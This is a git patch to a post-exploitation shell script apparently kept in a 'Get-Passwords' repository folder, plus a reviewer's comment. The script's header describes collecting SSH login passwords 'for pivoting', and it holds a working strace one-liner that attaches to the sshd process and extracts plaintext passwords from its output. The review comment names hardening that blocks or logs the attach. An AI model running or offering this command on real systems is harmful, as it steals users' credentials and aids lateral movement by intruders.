From 2148ab4df6639b826e1e22e7e1109571e94010a1 Mon Sep 17 00:00:00 2001 From: dade <0xdade@users.noreply.github.com> Date: Sat, 22 Jul 2017 18:04:15 -0700 Subject: [PATCH] Update sshstrace.sh --- Get-Passwords/sshstrace.sh | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Get-Passwords/sshstrace.sh b/Get-Passwords/sshstrace.sh index 2e18fde..8ea88af 100644 --- a/Get-Passwords/sshstrace.sh +++ b/Get-Passwords/sshstrace.sh @@ -2,7 +2,7 @@ # # In a facepalm revelation, it has come to my attention that you can use strace as root to collect passwords from sshd # Passwords are useful for pivoting and can be significantly faster than cracking /etc/shadow -# I've noticed some passwords seem to have an 'r' inserted before them. No idea why... +# If the password is longer than 8 characters and odd-length, some padding byte appears to be inserted at the front # strace -s 64 -fp `cat /var/run/sshd.pid` 2>&1 | grep --line-buffered -Eo 'write\(4, "\\0\\0\\0\\[0-9]*[^\]{2,}[^\\0]"' | sed -e 's/write(4, "\\0\\0\\0\\[0-9]*\(.*\)"/\1/g'
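Review bot: The header comment on the new side still omits the precondition the one-liner depends on, and the added line replaces "No idea why" with a cause ("some padding byte") that nothing in the patch verifies. The `strace -fp` call needs root and a successful ptrace attach to the PID read from /var/run/sshd.pid. A hardened host denies or records that attach: `kernel.yama.ptrace_scope=3` disables attach even for root, and an audit rule on the ptrace syscall logs it. I would say so next to the description, e.g. `# Requires root and ptrace attach to sshd; fails when kernel.yama.ptrace_scope=3, and the attach is visible to auditd`. I would also word the padding remark as an unconfirmed observation rather than an explanation.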